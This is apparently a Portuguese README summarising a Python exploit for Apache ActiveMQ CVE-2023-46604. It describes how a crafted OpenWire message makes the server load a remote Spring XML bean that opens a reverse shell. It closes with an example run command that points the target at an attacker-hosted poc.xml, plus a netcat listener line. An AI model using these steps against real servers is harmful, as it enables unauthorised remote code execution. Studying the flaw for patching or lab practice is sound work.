
O script explora uma vulnerabilidade de desserialização insegura no Apache ActiveMQ (CVE-2023-46604)
Resumo Técnico do Ataque: CVE-2023-46604
O script explora uma vulnerabilidade de desserialização insegura no Apache ActiveMQ (CVE-2023-46604) para obter a execução remota de código no servidor alvo. Descrição do Processo de Exploração
Objetivo da Vulnerabilidade:
A vulnerabilidade reside no protocolo OpenWire do Apache ActiveMQ.
Permite a desserialização insegura de objetos, o que pode ser aproveitado para executar código arbitrário no servidor.
Pré-requisitos:
Acesso de rede ao servidor ActiveMQ.
Um arquivo XML malicioso (poc.xml) disponível por meio de uma URL acessível pelo servidor alvo.
Componentes do Ataque:
Script Python: Automatiza o envio do payload malicioso ao servidor ActiveMQ.
Arquivo XML (poc.xml): Contém um bean do Spring que define a execução de um comando malicioso (por exemplo, abrir uma shell reversa).
Passos do Ataque
Preparação do Payload:
O script constrói uma mensagem em hexadecimal que inclui:
O nome da classe Java: org.springframework.context.support.ClassPathXmlApplicationContext.
A URL do arquivo XML malicioso.
O payload é convertido em uma sequência de bytes que pode ser enviada por meio do protocolo OpenWire.
Envio do Payload:
O script abre uma conexão de socket TCP com o servidor ActiveMQ na porta especificada (por padrão 61616).
Envia o payload malicioso ao servidor.
Execução do Código Malicioso:
O servidor ActiveMQ desserializa o objeto especificado no payload.
Devido à desserialização insegura, o bean do Spring definido no arquivo XML é carregado e executado.
Esse bean executa um comando malicioso (por exemplo, uma shell reversa) no servidor.
_________________________________________________________
exemplo de execução:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
este script foi copiado e modificado em espanhol:https://github.com/evkl1d/CVE-2023-46604.git